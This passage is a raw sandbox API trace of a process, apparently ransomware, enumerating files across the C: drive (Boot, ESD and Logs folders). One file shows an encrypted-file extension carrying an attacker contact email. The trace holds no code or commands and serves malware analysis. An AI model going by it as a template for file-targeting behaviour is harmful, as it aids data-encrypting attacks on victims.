ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x518ea25e, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0xe31db522, ftLastWriteTime.dwHighDateTime=0x1d112e1, nFileSizeHigh=0x0, nFileSizeLow=0xa558, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0285.462] FindClose (in: hFindFile=0x3947ea8 | out: hFindFile=0x3947ea8) returned 1 [0285.462] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.462] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0285.462] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.462] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947ea8 [0285.463] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.463] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.463] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa598, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0285.463] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa598, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0285.463] FindClose (in: hFindFile=0x3947ea8 | out: hFindFile=0x3947ea8) returned 1 [0285.479] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.480] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0285.480] FindClose (in: hFindFile=0x3947be8 | out: hFindFile=0x3947be8) returned 1 [0285.480] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4000730 | out: hHeap=0x470000) returned 1 [0285.483] FindNextFileW (in: hFindFile=0x48a830, lpFindFileData=0x2e8fcf8 | out: lpFindFileData=0x2e8fcf8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfb90936b, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0x607da, dwReserved0=0x77b20000, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0285.483] FindNextFileW (in: hFindFile=0x48a830, lpFindFileData=0x2e8fcf8 | out: lpFindFileData=0x2e8fcf8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef9d0a0c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x77b20000, dwReserved1=0x0, cFileName="BOOTNXT", cAlternateFileName="")) returned 1 [0285.483] FindNextFileW (in: hFindFile=0x48a830, lpFindFileData=0x2e8fcf8 | out: lpFindFileData=0x2e8fcf8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x5c6ee539, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c6ee539, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c82aaa5, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x20fc, dwReserved0=0x77b20000, dwReserved1=0x0, cFileName="BOOTSECT.BAK.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="BOOTSE~1.MSP")) returned 1 [0285.483] FindNextFileW (in: hFindFile=0x48a830, lpFindFileData=0x2e8fcf8 | out: lpFindFileData=0x2e8fcf8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0285.483] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4000730 [0285.484] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*", lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-TW", cAlternateFileName="鉠M\x16")) returned 0xffffffff [0285.485] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4000730 | out: hHeap=0x470000) returned 1 [0285.485] FindNextFileW (in: hFindFile=0x48a830, lpFindFileData=0x2e8fcf8 | out: lpFindFileData=0x2e8fcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ESD", cAlternateFileName="")) returned 1 [0285.486] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4000730 [0285.486] FindFirstFileW (in: lpFileName="C:\\ESD\\*", lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x39480a8 [0285.496] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0285.496] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 0 [0285.496] FindClose (in: hFindFile=0x39480a8 | out: hFindFile=0x39480a8) returned 1 [0285.497] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4000730 | out: hHeap=0x470000) returned 1 [0285.497] FindNextFileW (in: hFindFile=0x48a830, lpFindFileData=0x2e8fcf8 | out: lpFindFileData=0x2e8fcf8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7ef2dddf, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x7ef2dddf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xd02edbe2, ftLastWriteTime.dwHighDateTime=0x1d60985, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0285.497] FindNextFileW (in: hFindFile=0x48a830, lpFindFileData=0x2e8fcf8 | out: lpFindFileData=0x2e8fcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0285.497] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4000730 [0285.497] FindFirstFileW (in: lpFileName="C:\\Logs\\*", lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x39483a8 [0285.728] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0285.750] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5052fa31, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5052fa31, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Application.evtx", cAlternateFileName="APPLIC~1.EVT")) returned 1 [0285.750] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505ee5f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505ee5f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="HardwareEvents.evtx", cAlternateFileName="HARDWA~1.EVT")) returned 1 [0285.750] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505a2134, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505a2134, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Internet Explorer.evtx", cAlternateFileName="INTERN~1.EVT")) returned 1 [0285.750] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5057bed8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5057bed8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Key Management Service.evtx", cAlternateFileName="KEYMAN~1.EVT")) returned 1 [0285.751] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1dbd7c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc1dbd7c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Client-Licensing-Platform%4Admin.evtx", cAlternateFileName="MICROS~1.EVT")) returned 1 [0285.751] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5d836e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5d836e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", cAlternateFileName="MICROS~2.EVT")) returned 1 [0285.751] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9206ac5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9206ac5, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xf9c0f529, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", cAlternateFileName="MICROS~3.EVT")) returned 1 [0285.751] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", cAlternateFileName="MICROS~4.EVT")) returned 1 [0285.751] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4169a7a, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4169a7a, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-AppLocker%4MSI and Script.evtx", cAlternateFileName="MI2EEA~1.EVT")) returned 1 [0285.752] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", cAlternateFileName="MI07E1~1.EVT")) returned 1 [0285.752] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", cAlternateFileName="MI8196~1.EVT")) returned 1 [0285.752] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd41b5f2d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd41b5f2d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", cAlternateFileName="MIE36C~1.EVT")) returned 1 [0285.752] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd389efbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd389efbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-AppReadiness%4Admin.evtx", cAlternateFileName="MIC5CB~1.EVT")) returned 1 [0285.752] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd38c5212, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd38c5212, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-AppReadiness%4Operational.evtx", cAlternateFileName="MIF8AA~1.EVT")) returned 1 [0285.753] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-AppXDeployment%4Operational.evtx", cAlternateFileName="MI34FE~1.EVT")) returned 1 [0285.753] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af3554f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5af3554f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x211000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", cAlternateFileName="MIA24C~1.EVT")) returned 1 [0285.753] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af3554f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5af3554f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", cAlternateFileName="MIDBEC~1.EVT")) returned 1 [0285.753] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85798667, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x85798667, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-AppxPackaging%4Operational.evtx", cAlternateFileName="MI54F1~1.EVT")) returned 1 [0285.753] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74d25ab, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd74d25ab, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", cAlternateFileName="MI111F~1.EVT")) returned 1 [0285.753] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1f96ca4, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xe1f96ca4, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Bits-Client%4Operational.evtx", cAlternateFileName="MI9465~1.EVT")) returned 1 [0285.754] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8783aa15, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8783aa15, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-CodeIntegrity%4Operational.evtx", cAlternateFileName="MI03A7~1.EVT")) returned 1 [0285.755] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3c71c5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8c3c71c5, 